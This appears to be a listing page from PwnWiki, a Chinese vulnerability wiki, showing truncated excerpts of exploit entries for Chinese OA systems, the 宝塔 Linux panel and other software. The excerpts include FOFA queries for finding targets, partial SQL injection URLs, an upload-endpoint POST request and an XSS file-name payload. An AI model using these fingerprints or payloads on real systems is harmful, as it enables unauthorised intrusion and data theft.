name | PwnWiki

云尚在线客服系统任意文件上传漏洞

PWNWIK.COM , FOFA body="cgwl.ico" 漏洞利用访问 /index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1& ...

阅读全文
超星学习通网课平台信息泄露漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com , EXP <!DOCTYPE html> <head> <meta charset="UTF-8"> <title>！！！</ ...

阅读全文
致远OA A6 test.jsp SQL注入漏洞/zh-hant

免费、自由、人人可编辑的漏洞库--PwnWiki.com , Contents 1 FOFA 2 Payload 3 高级利用 4 参考 FOFA title="致远A8+协同管理软件.A6" Payload http://xxx.xxx. ...

阅读全文
致远OA A6 test.jsp SQL注入漏洞

pwnwiki.com , Contents 1 FOFA 2 Payload 3 高级利用 4 参考 FOFA title="致远A8+协同管理软件.A6" Payload http://xxx.xxx.xxx.xxx/yyoa/comm ...

阅读全文
联软准入任意文件上传漏洞

免费、自由、人人可编辑的漏洞库 , POC POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx ... ... ----------------------------- ...

阅读全文
宝塔linux面板 6.0 存储型XSS Getshell漏洞/zh-cn

PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , 漏洞影响宝塔Linux面板<6.0 漏洞利用在web目录下上传一个文件名为<img src=x onerror="alert(1)">的文件宝塔后台浏览文件 ...

阅读全文
宝塔linux面板 6.0 存储型XSS Getshell漏洞

免费、自由、人人可编辑的漏洞库 , 漏洞影响宝塔Linux面板<6.0 漏洞利用在web目录下上传一个文件名为<img src=x onerror="alert(1)">的文件宝塔后台浏览文件,触发payload G ...

阅读全文
启莱OA treelist.aspx SQL注入漏洞

免费、自由、人人可编辑的漏洞库 , FOFA app="启莱OA" 存在SQL注入的文件为 treelist.aspx http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (sele ...

阅读全文
启莱OA messageurl.aspx SQL注入漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com , FOFA app="启莱OA" 存在SQL注入的文件为 messageurl.aspx http://xxx.xxx.xxx.xxx/client/messageurl.aspx ...

阅读全文
启莱OA CloseMsg.aspx SQL注入漏洞

PWNWIK.COM , FOFA app="启莱OA" 存在SQL注入的文件为 CloseMsg.aspx: http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select d ...

阅读全文

1 of 1612 3 4 5 »10...尾页 »